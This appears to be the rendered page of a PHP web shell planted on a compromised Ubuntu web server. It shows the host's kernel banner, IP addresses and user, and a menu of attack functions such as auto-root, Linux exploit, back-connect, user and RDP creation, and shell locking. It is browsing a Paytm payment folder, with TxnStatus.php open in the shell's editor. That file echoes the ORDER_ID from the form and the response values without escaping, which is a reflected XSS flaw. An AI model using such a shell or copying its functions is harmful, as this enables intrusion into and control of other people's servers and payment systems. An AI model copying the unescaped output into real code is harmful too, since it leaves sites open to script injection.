Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.191.189.119
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
Paytm /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-sr-x
TxnStatus.php
2.19
KB
-rwxr-xr-x
TxnTest.php
1.81
KB
-rwxr-xr-x
error_log
34.1
KB
-rwxr-xr-x
pgRedirect.php
2.6
KB
-rwxr-xr-x
pgResponse.php
1.47
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TxnStatus.php
<?php header("Pragma: no-cache"); header("Cache-Control: no-cache"); header("Expires: 0"); // following files need to be included require_once("./lib/config_paytm.php"); require_once("./lib/encdec_paytm.php"); $ORDER_ID = ""; $requestParamList = array(); $responseParamList = array(); if (isset($_POST["ORDER_ID"]) && $_POST["ORDER_ID"] != "") { // In Test Page, we are taking parameters from POST request. In actual implementation these can be collected from session or DB. $ORDER_ID = $_POST["ORDER_ID"]; // Create an array having all required parameters for status query. $requestParamList = array("MID" => PAYTM_MERCHANT_MID , "ORDERID" => $ORDER_ID); $StatusCheckSum = getChecksumFromArray($requestParamList,PAYTM_MERCHANT_KEY); $requestParamList['CHECKSUMHASH'] = $StatusCheckSum; // Call the PG's getTxnStatusNew() function for verifying the transaction status. $responseParamList = getTxnStatusNew($requestParamList); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Transaction status query</title> <meta name="GENERATOR" content="Evrsoft First Page"> </head> <body> <h2>Transaction status query</h2> <form method="post" action=""> <table border="1"> <tbody> <tr> <td><label>ORDER_ID::*</label></td> <td><input id="ORDER_ID" tabindex="1" maxlength="20" size="20" name="ORDER_ID" autocomplete="off" value="<?php echo $ORDER_ID ?>"> </td> </tr> <tr> <td></td> <td><input value="Status Query" type="submit" onclick=""></td> </tr> </tbody> </table> <br/></br/> <?php if (isset($responseParamList) && count($responseParamList)>0 ) { ?> <h2>Response of status query:</h2> <table style="border: 1px solid nopadding" border="0"> <tbody> <?php foreach($responseParamList as $paramName => $paramValue) { ?> <tr > <td style="border: 1px solid"><label><?php echo $paramName?></label></td> <td style="border: 1px solid"><?php echo $paramValue?></td> </tr> <?php } ?> </tbody> </table> <?php } ?> </form> </body> </html>
Close